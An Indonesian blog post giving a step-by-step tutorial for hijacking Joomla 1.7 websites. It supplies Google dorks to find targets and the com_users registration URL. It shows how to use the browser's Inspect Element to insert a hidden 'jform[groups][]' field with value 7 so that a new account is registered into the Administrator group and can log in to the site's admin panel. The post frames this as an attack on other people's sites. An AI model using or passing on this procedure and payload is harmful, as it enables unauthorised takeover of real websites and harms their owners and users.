Exploit Joomla | Inspect Element |

Exploit Joomla | Inspect Element |

Edit

Exploit Joomla | Inspect Element |

Assalamu'alaikum semuanya
Baik baik aja kan
Wkwkwkwkwk =)

Kali saya akan memberikan tutorial Exploit Joomla | Inspect Element |
Tutorial ini mirip dengan Joomla Com User hanya aja langkah langkah nya berbeda

Oke tanpa basa basi langsung di simak yaa

Langkah langkah :
1. Cari target menggunakan dork di bawah ini :
intext:"joomla! 1.7 - Open Source Content Management" site:surcentro.com
intext:"joomla! 1.7 - Open Source Content Management" site:domainsigma.com
intext:"joomla! 1.7 - Open Source Content Management" site:www.statmyweb.com 
Note : Agar anda ingin mendapatkan target yang banyak, anda tinggal menambahkan kata kata nya di belakang nya.
Contoh pilih salah satu :
intext:"joomla! 1.7 - Open Source Content Management" site:www.statmyweb.com book
intext:"joomla! 1.7 - Open Source Content Management" site:www.statmyweb.com chair
Mudah bukan ...!!
Kreasikan sesuka anda, Use Your Brain ...!!! ^_^

2. Untuk melihat target yang vuln anda tinggal menambahkan di akhir target anda /administrator
Lihat gambar di bawah :
 
Vuln ^_^

Tidak Vuln -_-

3. Setelah mendapatkan target, langkah selanjutnya anda masukkan exploit nya
/index.php?option=com_users&view=registration
Contoh : http://target.com/index.php?option=com_users&view=registration

4. Lalu anda melihat halaman registrasi nya



5. Isikan Halaman yang kosong ( Nama, Username, Password, Email )
Note : Untuk bagian password, isikan Password dan Confirm Password secara berbeda.
Contoh:
Password: nevermore
Confirm Password: worldcup


6. Klik pada kotak email ke 2 ( Confirm Email Address ) -> Klik Kanan pada mouse -> Inspect Element / Periksa Element


7. Setelah menyelesaikan langkah ke 6, maka akan muncul Tapmpilan seperti Gambar di atas. Lalu klik kanan pada kode HTML <dd> lalu klik tulisan Edit As Html.
 


8. Setelah itu, masukkan kode EXPLOIT ini
<dd><input value="7" name="jform[groups][]" /></ dd>
di bagian paling bawah setelah kode HTML. Lihat gambar di atas
Note : Value 7 menunjukan kita berada di Administrator Grup bukan di Super User grup yang ada di Value 8.

9. Klik Registrasi
 

10. Setelah ada pemberitahuan Password yang anda masukkan tidak cocok seperti Gambar diatas.
Langkah selanjutnya adalah Mengisi kembali pada kotak Password dengan Password anda yang benar.
Contoh :
Password : nevermore
Confirm Password : nevermore

11. Setelah registrasi sukses. Lalu pergi ke Email anda lalu Klik Kode Aktivasi yang diberikan oleh web tersebut.
*Jika alamat aktivasi web tersebut tidak masuk ke inbox, maka anda bisa melihatnya di bagian spam*

12. Setelah mengklik kode validasi, lalu pergi ke halaman administrator web tersebut dengan menambahkan /administrator di belakang alamat web tersebut.
Contoh:
http://target.com/administrator

13. Lalu login dech Taraaaaaaaaaa

 
Success
Jika ada yg belom di mengerti
Silahkan komentar di bawah ^_^
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

luvne.com resepkuekeringku.com desainrumahnya.com yayasanbabysitterku.com
Subscribe to: Post Comments ( Atom )